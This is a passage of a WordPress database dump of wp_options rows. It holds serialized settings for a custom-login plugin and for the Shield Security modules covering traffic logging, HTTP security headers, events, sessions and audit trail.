gin_top','s:404:\"a:9:{s:11:\"top_bg_type\";s:23:\"static-background-color\";s:9:\"top_color\";s:7:\"#2041a5\";s:9:\"top_image\";s:84:\"https://zphiblgz.org/wp-content/plugins/admin-custom-login//images/3d-background.jpg\";s:9:\"top_cover\";s:3:\"yes\";s:10:\"top_repeat\";s:6:\"repeat\";s:12:\"top_position\";s:8:\"left top\";s:14:\"top_attachment\";s:5:\"fixed\";s:16:\"top_slideshow_no\";s:1:\"6\";s:23:\"top_bg_slider_animation\";s:13:\"slider-style1\";}\";','yes'),(131743,'Admin_custome_login_login','s:1366:\"a:29:{s:19:\"login_form_position\";s:7:\"default\";s:16:\"login_form_float\";s:6:\"center\";s:15:\"login_form_left\";s:3:\"700\";s:14:\"login_form_top\";s:3:\"300\";s:16:\"login_custom_css\";s:0:\"\";s:19:\"login_redirect_user\";s:0:\"\";s:13:\"login_bg_type\";s:23:\"static-background-image\";s:14:\"login_bg_color\";s:7:\"#1e73be\";s:15:\"login_bg_effect\";s:9:\"pattern-1\";s:14:\"login_bg_image\";s:84:\"https://zphiblgz.org/wp-content/plugins/admin-custom-login//images/3d-background.jpg\";s:18:\"login_form_opacity\";s:2:\"10\";s:16:\"login_form_width\";s:3:\"358\";s:17:\"login_form_radius\";s:2:\"10\";s:18:\"login_border_style\";s:5:\"solid\";s:21:\"login_border_thikness\";s:1:\"4\";s:18:\"login_border_color\";s:7:\"#0069A0\";s:15:\"login_bg_repeat\";s:6:\"repeat\";s:17:\"login_bg_position\";s:8:\"left top\";s:19:\"login_enable_shadow\";s:3:\"yes\";s:18:\"login_shadow_color\";s:7:\"#C8C8C8\";s:18:\"log_form_above_msg\";s:0:\"\";s:18:\"login_msg_fontsize\";s:2:\"16\";s:20:\"login_msg_font_color\";s:7:\"#000000\";s:11:\"tagline_msg\";s:187:\"Login form is designed using <a href=\"https://wordpress.org/plugins/admin-custom-login/\" target=\"_blank\">ACL</a> plugin by <a href=\"https://www.weblizar.com\" target=\"_blank\">Weblizar</a>.\";s:13:\"user_cust_lbl\";s:22:\"Type Username or Email\";s:13:\"pass_cust_lbl\";s:13:\"Type Password\";s:14:\"label_username\";s:16:\"Username / Email\";s:14:\"label_password\";s:8:\"Password\";s:17:\"label_loginButton\";s:6:\"Log In\";}\";','yes'),(131715,'akismet_comment_form_privacy_notice','hide','yes'),(334251,'shield_mod_config_4cc72f7c28d6d08a37b91ebfa429fa8e','a:7:{s:4:\"slug\";s:7:\"traffic\";s:10:\"properties\";a:13:{s:4:\"slug\";s:7:\"traffic\";s:4:\"name\";s:13:\"Traffic Watch\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:7:\"traffic\";s:7:\"tagline\";s:31:\"Watch All Requests To Your Site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:110;}s:12:\"requirements\";a:1:{s:3:\"php\";a:1:{s:7:\"version\";s:3:\"5.4\";}}s:8:\"sections\";a:4:{i:0;a:5:{s:4:\"slug\";s:23:\"section_traffic_options\";s:7:\"primary\";b:1;s:5:\"title\";s:21:\"Traffic Watch Options\";s:11:\"title_short\";s:7:\"Options\";s:7:\"summary\";a:2:{i:0;s:62:\"Purpose - Provides finer control over the live traffic system.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:1;a:4:{s:4:\"slug\";s:23:\"section_traffic_limiter\";s:5:\"title\";s:15:\"Traffic Limiter\";s:11:\"title_short\";s:7:\"Options\";s:7:\"summary\";a:2:{i:0;s:80:\"Purpose - Provides ability to restrict excessive requests from a single visitor.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:2;a:4:{s:4:\"slug\";s:37:\"section_enable_plugin_feature_traffic\";s:5:\"title\";s:28:\"Enable Module: Traffic Watch\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:89:\"Purpose - The Traffic Watch module lets you monitor and review all requests to your site.\";i:1;s:103:\"Recommendation - Required only if you need to review and investigate and monitor requests to your site.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:9:{i:0;a:9:{s:3:\"key\";s:14:\"enable_traffic\";s:7:\"section\";s:37:\"section_enable_plugin_feature_traffic\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/ed\";s:9:\"link_blog\";s:19:\"https://shsec.io/ee\";s:4:\"name\";s:20:\"Enable Traffic Watch\";s:7:\"summary\";s:44:\"Enable (or Disable) The Traffic Watch Module\";s:11:\"description\";s:73:\"Un-Checking this option will completely disable the Traffic Watch module.\";}i:1;a:10:{s:3:\"key\";s:15:\"type_exclusions\";s:7:\"section\";s:23:\"section_traffic_options\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:4:{i:0;s:9:\"logged_in\";i:1;s:4:\"cron\";i:2;s:6:\"search\";i:3;s:6:\"uptime\";}s:13:\"value_options\";a:7:{i:0;a:2:{s:9:\"value_key\";s:6:\"simple\";s:4:\"text\";s:15:\"Simple Requests\";}i:1;a:2:{s:9:\"value_key\";s:3:\"api\";s:4:\"text\";s:8:\"REST API\";}i:2;a:2:{s:9:\"value_key\";s:4:\"ajax\";s:4:\"text\";s:4:\"AJAX\";}i:3;a:2:{s:9:\"value_key\";s:9:\"logged_in\";s:4:\"text\";s:15:\"Logged-In Users\";}i:4;a:2:{s:9:\"value_key\";s:4:\"cron\";s:4:\"text\";s:7:\"WP CRON\";}i:5;a:2:{s:9:\"value_key\";s:6:\"search\";s:4:\"text\";s:14:\"Search Engines\";}i:6;a:2:{s:9:\"value_key\";s:6:\"uptime\";s:4:\"text\";s:26:\"Uptime Monitoring Services\";}}s:9:\"link_info\";s:19:\"https://shsec.io/eb\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Traffic Log Exclusions\";s:7:\"summary\";s:41:\"Select Which Types Of Requests To Exclude\";s:11:\"description\";s:74:\"Deselect any requests that you don\'t want to appear in the traffic viewer.\";}i:2;a:9:{s:3:\"key\";s:17:\"custom_exclusions\";s:7:\"section\";s:23:\"section_traffic_options\";s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/ec\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Custom Exclusions\";s:7:\"summary\";s:33:\"Provide Custom Traffic Exclusions\";s:11:\"description\";s:98:\"For each entry, if the text is present in either the User Agent or Page/Path, it will be excluded.\";}i:3;a:10:{s:3:\"key\";s:10:\"auto_clean\";s:7:\"section\";s:23:\"section_traffic_options\";s:7:\"default\";i:3;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Auto Expiry Cleaning\";s:7:\"summary\";s:30:\"Enable Traffic Log Auto Expiry\";s:11:\"description\";s:78:\"Automated DB cleanup will delete logs older than this maximum value (in days).\";}i:4;a:10:{s:3:\"key\";s:11:\"max_entries\";s:7:\"section\";s:23:\"section_traffic_options\";s:7:\"default\";i:1000;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Max Log Length\";s:7:\"summary\";s:34:\"Maximum Traffic Log Length To Keep\";s:11:\"description\";s:81:\"Automated DB cleanup will delete logs to maintain this maximum number of records.\";}i:5;a:9:{s:3:\"key\";s:12:\"auto_disable\";s:7:\"section\";s:23:\"section_traffic_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Auto Disable\";s:7:\"summary\";s:41:\"Auto Disable Traffic Logging After 1 Week\";s:11:\"description\";s:90:\"Turn on to prevent unnecessary long-term traffic logging. Timer resets each time you save.\";}i:6;a:10:{s:3:\"key\";s:14:\"limit_requests\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";s:2:\"20\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Max Request Limit\";s:7:\"summary\";s:48:\"Maximum Number Of Requests Allowed In Time Limit\";s:11:\"description\";s:72:\"The maximum number of requests that are allowed in the given time limit.\";}i:7;a:10:{s:3:\"key\";s:15:\"limit_time_span\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";s:2:\"20\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:27:\"Request Limit Time Interval\";s:7:\"summary\";s:48:\"The Time Interval To Test For Excessive Requests\";s:11:\"description\";s:84:\"The time limit within which to monitor for excessive requests that exceed the limit.\";}i:8;a:5:{s:3:\"key\";s:14:\"autodisable_at\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:12:\"transferable\";b:0;s:7:\"default\";i:0;}}s:11:\"definitions\";a:4:{s:10:\"db_classes\";a:1:{s:7:\"traffic\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Traffic\\Handler\";}s:18:\"traffic_table_name\";s:7:\"traffic\";s:21:\"traffic_table_columns\";a:11:{i:0;s:2:\"id\";i:1;s:3:\"rid\";i:2;s:3:\"uid\";i:3;s:2:\"ip\";i:4;s:4:\"path\";i:5;s:4:\"code\";i:6;s:2:\"ua\";i:7;s:4:\"verb\";i:8;s:5:\"trans\";i:9;s:10:\"created_at\";i:10;s:10:\"deleted_at\";}s:6:\"events\";a:1:{s:22:\"request_limit_exceeded\";a:2:{s:3:\"cat\";i:3;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1582303038;}','yes'),(463279,'auto_update_plugins','a:0:{}','no'),(439308,'ninja_forms_needs_updates','0','yes'),(143321,'_tml_dismissed_notices','a:3:{i:0;s:17:\"new_extension-2fa\";i:1;s:20:\"new_extension-social\";i:2;s:23:\"new_extension-mailchimp\";}','no'),(143322,'updraftplus_dismisseddashnotice','1632877328','yes'),(140121,'mc_mm_dismiss_review_notice','true','yes'),(420385,'shield_mod_config_e0d6ff88278df057ce5240bb8e81a8e9','a:5:{s:4:\"slug\";s:7:\"headers\";s:10:\"properties\";a:14:{s:4:\"slug\";s:7:\"headers\";s:4:\"name\";s:12:\"HTTP Headers\";s:12:\"sidebar_name\";s:12:\"HTTP Headers\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:7:\"headers\";s:7:\"tagline\";s:29:\"Control HTTP Security Headers\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:80;}s:8:\"sections\";a:4:{i:0;a:5:{s:4:\"slug\";s:24:\"section_security_headers\";s:7:\"primary\";b:1;s:5:\"title\";s:25:\"Advanced Security Headers\";s:11:\"title_short\";s:16:\"Security Headers\";s:7:\"summary\";a:2:{i:0;s:92:\"Purpose - Protect visitors to your site by implementing increased security response headers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:1;a:4:{s:4:\"slug\";s:31:\"section_content_security_policy\";s:5:\"title\";s:23:\"Content Security Policy\";s:11:\"title_short\";s:23:\"Content Security Policy\";s:7:\"summary\";a:2:{i:0;s:105:\"Purpose - Restrict the sources and types of content that may be loaded and processed by visitor browsers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:2;a:4:{s:4:\"slug\";s:37:\"section_enable_plugin_feature_headers\";s:5:\"title\";s:27:\"Enable Module: HTTP Headers\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:92:\"Purpose - Protect visitors to your site by implementing increased security response headers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:13:{i:0;a:10:{s:3:\"key\";s:14:\"enable_headers\";s:7:\"section\";s:37:\"section_enable_plugin_feature_headers\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/aj\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:19:\"Enable HTTP Headers\";s:7:\"summary\";s:43:\"Enable (or Disable) The HTTP Headers module\";s:11:\"description\";s:71:\"Un-Checking this option will completely disable the HTTP Headers module\";}i:1;a:10:{s:3:\"key\";s:7:\"x_frame\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:13:\"on_sameorigin\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:3:\"off\";s:4:\"text\";s:24:\"Off: iFrames Not Blocked\";}i:1;a:2:{s:9:\"value_key\";s:13:\"on_sameorigin\";s:4:\"text\";s:36:\"On: Allow iFrames On The Same Domain\";}i:2;a:2:{s:9:\"value_key\";s:7:\"on_deny\";s:4:\"text\";s:21:\"On: Block All iFrames\";}}s:9:\"link_info\";s:19:\"https://shsec.io/78\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:13:\"Block iFrames\";s:7:\"summary\";s:33:\"Block Remote iFrames Of This Site\";s:11:\"description\";s:139:\"The setting prevents any external website from embedding your site in an iFrame. This is useful for preventing so-called ClickJack attacks.\";}i:2;a:9:{s:3:\"key\";s:13:\"x_xss_protect\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/79\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:14:\"XSS Protection\";s:7:\"summary\";s:38:\"Employ Built-In Browser XSS Protection\";s:11:\"description\";s:80:\"Directs compatible browsers to block what they detect as Reflective XSS attacks.\";}i:3;a:9:{s:3:\"key\";s:14:\"x_content_type\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/7a\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:18:\"Prevent Mime-Sniff\";s:7:\"summary\";s:27:\"Turn-Off Browser Mime-Sniff\";s:11:\"description\";s:60:\"Reduces visitor exposure to malicious user-uploaded content.\";}i:4;a:11:{s:3:\"key\";s:17:\"x_referrer_policy\";s:7:\"section\";s:24:\"section_security_headers\";s:9:\"sensitive\";b:0;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:10:\"unsafe-url\";s:13:\"value_options\";a:10:{i:0;a:2:{s:9:\"value_key\";s:10:\"unsafe-url\";s:4:\"text\";s:45:\"Default: Full Referrer URL (aka \'Unsafe URL\')\";}i:1;a:2:{s:9:\"value_key\";s:11:\"no-referrer\";s:4:\"text\";s:11:\"No Referrer\";}i:2;a:2:{s:9:\"value_key\";s:26:\"no-referrer-when-downgrade\";s:4:\"text\";s:26:\"No Referrer When Downgrade\";}i:3;a:2:{s:9:\"value_key\";s:11:\"same-origin\";s:4:\"text\";s:11:\"Same Origin\";}i:4;a:2:{s:9:\"value_key\";s:6:\"origin\";s:4:\"text\";s:6:\"Origin\";}i:5;a:2:{s:9:\"value_key\";s:13:\"strict-origin\";s:4:\"text\";s:13:\"Strict Origin\";}i:6;a:2:{s:9:\"value_key\";s:24:\"origin-when-cross-origin\";s:4:\"text\";s:24:\"Origin When Cross-Origin\";}i:7;a:2:{s:9:\"value_key\";s:31:\"strict-origin-when-cross-origin\";s:4:\"text\";s:31:\"Strict Origin When Cross-Origin\";}i:8;a:2:{s:9:\"value_key\";s:5:\"empty\";s:4:\"text\";s:12:\"Empty Header\";}i:9;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:33:\"Disabled - Don\'t Send This Header\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Referrer Policy\";s:7:\"summary\";s:22:\"Referrer Policy Header\";s:11:\"description\";s:141:\"The Referrer Policy Header allows you to control when and what referral information a browser may pass along with links clicked on your site.\";}i:5;a:9:{s:3:\"key\";s:32:\"enable_x_content_security_policy\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/7d\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:30:\"Enable Content Security Policy\";s:7:\"summary\";s:54:\"Enable (or Disable) The Content Security Policy module\";s:11:\"description\";s:75:\"Allows for permission and restriction of all resources loaded on your site.\";}i:6;a:9:{s:3:\"key\";s:9:\"xcsp_self\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:4:\"Self\";s:7:\"summary\";s:22:\"Allow \'self\' Directive\";s:11:\"description\";s:117:\"Using \'self\' is generally recommended. It essentially means that resources from your own host:protocol are permitted.\";}i:7;a:9:{s:3:\"key\";s:11:\"xcsp_inline\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Inline Entities\";s:7:\"summary\";s:28:\"Allow Inline Scripts and CSS\";s:11:\"description\";s:76:\"Allows parsing of Javascript and CSS declared in-line in your html document.\";}i:8;a:9:{s:3:\"key\";s:9:\"xcsp_data\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"Embedded Data\";s:7:\"summary\";s:24:\"Allow \'data:\' Directives\";s:11:\"description\";s:80:\"Allows use of embedded data directives, most commonly used for images and fonts.\";}i:9;a:9:{s:3:\"key\";s:9:\"xcsp_eval\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Allow eval()\";s:7:\"summary\";s:23:\"Allow Javascript eval()\";s:11:\"description\";s:50:\"Permits the use of Javascript the eval() function.\";}i:10;a:9:{s:3:\"key\";s:10:\"xcsp_https\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:5:\"HTTPS\";s:7:\"summary\";s:22:\"HTTPS Resource Loading\";s:11:\"description\";s:50:\"Allows loading of any content provided over HTTPS.\";}i:11;a:10:{s:3:\"key\";s:10:\"xcsp_hosts\";s:7:\"section\";s:31:\"section_content_security_policy\";s:9:\"sensitive\";b:1;s:7:\"default\";a:1:{i:0;s:1:\"*\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/ga\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Permitted Hosts\";s:7:\"summary\";s:27:\"Permitted Hosts and Domains\";s:11:\"description\";s:276:\"You can explicitly state which hosts/domain from which content may be loaded. Take great care and test your site as you may block legitimate resources. If in-doubt, leave blank or use \'*\' only. Note: You can force only HTTPS for a given domain by prefixing it with \'https://\'.\";}i:12;a:10:{s:3:\"key\";s:11:\"xcsp_custom\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/g9\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Manual Rules\";s:7:\"summary\";s:16:\"Manual CSP Rules\";s:11:\"description\";s:58:\"Manual CSP rules which are not covered by the rules above.\";}}s:10:\"meta_modts\";i:1611420210;}','yes'),(334248,'shield_mod_config_8adf2aac7649ea27a12e61a2bf79d84a','a:5:{s:10:\"properties\";a:11:{s:4:\"slug\";s:6:\"events\";s:4:\"name\";s:6:\"Events\";s:21:\"show_module_menu_item\";b:0;s:11:\"storage_key\";s:6:\"events\";s:7:\"tagline\";s:37:\"Collection of plugin events and stats\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;}s:8:\"sections\";a:2:{i:0;a:5:{s:4:\"slug\";s:36:\"section_enable_plugin_feature_events\";s:7:\"primary\";b:1;s:5:\"title\";s:21:\"Enable Module: Events\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:70:\"Purpose - Helps you see at a glance how effective the plugin has been.\";i:1;s:55:\"Recommendation - Keep the Statistics feature turned on.\";}}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:1:{i:0;a:9:{s:3:\"key\";s:13:\"enable_events\";s:7:\"section\";s:36:\"section_enable_plugin_feature_events\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"Enable Events\";s:7:\"summary\";s:41:\"Enable (or Disable) The Statistics module\";s:11:\"description\";s:69:\"Un-Checking this option will completely disable the Statistics module\";}}s:11:\"definitions\";a:3:{s:10:\"db_classes\";a:1:{s:6:\"events\";s:65:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Events\\Handler\";}s:17:\"events_table_name\";s:6:\"events\";s:20:\"events_table_columns\";a:5:{i:0;s:2:\"id\";i:1;s:5:\"event\";i:2;s:5:\"count\";i:3;s:10:\"created_at\";i:4;s:10:\"deleted_at\";}}s:10:\"meta_modts\";i:1582303038;}','yes'),(334249,'shield_mod_config_c8cdbed5373178ba0c8b27798683ce7d','a:5:{s:10:\"properties\";a:13:{s:4:\"slug\";s:8:\"sessions\";s:4:\"name\";s:8:\"Sessions\";s:21:\"show_module_menu_item\";b:0;s:11:\"storage_key\";s:8:\"sessions\";s:7:\"tagline\";s:13:\"User Sessions\";s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:19:\"auto_load_processor\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;}s:8:\"sections\";a:2:{i:0;a:5:{s:4:\"slug\";s:38:\"section_enable_plugin_feature_sessions\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Enable Module: Sessions\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:44:\"Purpose - Creates and Manages User Sessions.\";i:1;s:53:\"Recommendation - Keep the Sessions feature turned on.\";}}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:2:{i:0;a:9:{s:3:\"key\";s:15:\"enable_sessions\";s:7:\"section\";s:38:\"section_enable_plugin_feature_sessions\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Enable Sessions\";s:7:\"summary\";s:39:\"Enable (or Disable) The Sessions module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Sessions module\";}i:1;a:5:{s:3:\"key\";s:27:\"autoadd_sessions_started_at\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:12:\"transferable\";b:0;s:7:\"default\";i:0;}}s:11:\"definitions\";a:4:{s:10:\"db_classes\";a:1:{s:7:\"session\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Session\\Handler\";}s:19:\"sessions_table_name\";s:8:\"sessions\";s:22:\"sessions_table_columns\";a:13:{i:0;s:2:\"id\";i:1;s:10:\"session_id\";i:2;s:11:\"wp_username\";i:3;s:2:\"ip\";i:4;s:7:\"browser\";i:5;s:12:\"logged_in_at\";i:6;s:16:\"last_activity_at\";i:7;s:17:\"last_activity_uri\";i:8;s:13:\"li_code_email\";i:9;s:23:\"login_intent_expires_at\";i:10;s:11:\"secadmin_at\";i:11;s:10:\"created_at\";i:12;s:10:\"deleted_at\";}s:6:\"events\";a:2:{s:13:\"session_start\";a:1:{s:5:\"audit\";b:0;}s:17:\"session_terminate\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}}}s:10:\"meta_modts\";i:1582303038;}','yes'),(334250,'shield_mod_config_7c02f16ba211df1c4b0a02f04971f2c8','a:6:{s:4:\"slug\";s:11:\"audit_trail\";s:10:\"properties\";a:13:{s:4:\"slug\";s:11:\"audit_trail\";s:4:\"name\";s:11:\"Audit Trail\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:11:\"audit_trail\";s:7:\"tagline\";s:56:\"Get a view on what happens on your site, when it happens\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:110;}s:8:\"sections\";a:5:{i:0;a:5:{s:4:\"slug\";s:29:\"section_enable_audit_contexts\";s:7:\"primary\";b:1;s:5:\"title\";s:21:\"Enable Audit Contexts\";s:11:\"title_short\";s:14:\"Audit Contexts\";s:7:\"summary\";a:2:{i:0;s:65:\"Purpose - Specify which types of actions on your site are logged.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:1;a:4:{s:4:\"slug\";s:27:\"section_audit_trail_options\";s:5:\"title\";s:19:\"Audit Trail Options\";s:11:\"title_short\";s:7:\"Options\";s:7:\"summary\";a:2:{i:0;s:61:\"Purpose - Provides finer control over the audit trail itself.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:2;a:5:{s:4:\"slug\";s:23:\"section_change_tracking\";s:6:\"hidden\";b:1;s:5:\"title\";s:15:\"Change Tracking\";s:11:\"title_short\";s:15:\"Change Tracking\";s:7:\"summary\";a:2:{i:0;s:49:\"Purpose - Track significant changes to your site.\";i:1;s:55:\"Recommendation - Keep this Reporting feature turned on.\";}}i:3;a:4:{s:4:\"slug\";s:41:\"section_enable_plugin_feature_audit_trail\";s:5:\"title\";s:26:\"Enable Module: Audit Trail\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:124:\"Purpose - The Audit Trail is designed so you can look back on events and analyse what happened and what may have gone wrong.\";i:1;s:56:\"Recommendation - Keep the Audit Trail feature turned on.\";}}i:4;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:14:{i:0;a:9:{s:3:\"key\";s:18:\"enable_audit_trail\";s:7:\"section\";s:41:\"section_enable_plugin_feature_audit_trail\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/5p\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:4:\"name\";s:18:\"Enable Audit Trail\";s:7:\"summary\";s:42:\"Enable (or Disable) The Audit Trail module\";s:11:\"description\";s:70:\"Un-Checking this option will completely disable the Audit Trail module\";}i:1;a:10:{s:3:\"key\";s:22:\"audit_trail_auto_clean\";s:7:\"section\";s:27:\"section_audit_trail_options\";s:7:\"default\";i:14;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/a2\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:4:\"name\";s:10:\"Auto Clean\";s:7:\"summary\";s:26:\"Enable Audit Auto Cleaning\";s:11:\"description\";s:94:\"Events older than the number of days specified will be automatically cleaned from the database\";}i:2;a:11:{s:3:\"key\";s:23:\"audit_trail_max_entries\";s:7:\"section\";s:27:\"section_audit_trail_options\";s:7:\"premium\";b:1;s:7:\"default\";i:1000;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Max Trail Length\";s:7:\"summary\";s:34:\"Maximum Audit Trail Length To Keep\";s:11:\"description\";s:73:\"Automatically remove any audit trail entries when this limit is 